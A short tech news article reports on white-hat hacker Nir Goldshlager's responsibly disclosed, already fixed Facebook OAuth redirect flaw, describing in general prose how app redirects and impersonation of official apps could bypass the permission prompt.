Hackers have been exploiting the endless holes in the security nightmare that is Java, terrorizing Web and social giants –– Google, Facebook, Tumblr, Twitter, Pinterest –– over the past few weeks.
Meanwhile, another hacker called Nir Goldshlager found further proof of the accidental back doors that lead into the digital worlds so many of us trust with so much of our lives. And it doesn't even involve Java, Oracle's inexplicably popular stinking mess of a platform.
On Friday, Feb. 22 Goldshlager posted a guide on his blog to the procedure he used to discover and exploit “one of my favorite flaws” in Facebook’s application system.
The flaw was discovered in the way Facebook's security protocol, called OAuth, uses, reads and interprets the Web addresses that guide the site's many capabilities.
When someone creates a Facebook app, such as Facebook’s own Messages or Pages apps, that app is assigned an ID number that is used to track the app and relevant information.
Each ID number is tied to one website that it is allowed to redirect to. An app trying to redirect to any other website will result in an error. This is an example of Facebook’s security doing what it is supposed to.
But Goldshlager found out he could send messages through other parts of Facebook’s own Web addresses, instead of the one website that an app ID is tied to.
Then he used this transfer within Facebook to point at another app that would forward people to a website he had set up, which would take the user –– as well as all their information and permission to do anything to their profile –– and store them in a file on his website.
But this process would have still stopped at the permission page, which would have alerted the user that an app was asking for permission to do anything –– read or send messages, update status, friend/unfriend people –– which would tip the victims off.
Goldshlager figured out that, if he pretended to be an official Facebook app, like Messages, that Facebook would trust the request and not ask for permission, giving the hacker free access to whatever they wanted to do.
Now, Goldshlager being a nice guy and all (a white hat hacker, as such security types are called) didn’t tell anyone about it until after Facebook had fixed the problem, to make sure no one else could do it.
He ends the blog post by saying there is definitely more where that came from, but he will continue waiting to share until no one can be harmed by his doing so.
Can't you just wait to see how vulnerable we are right now?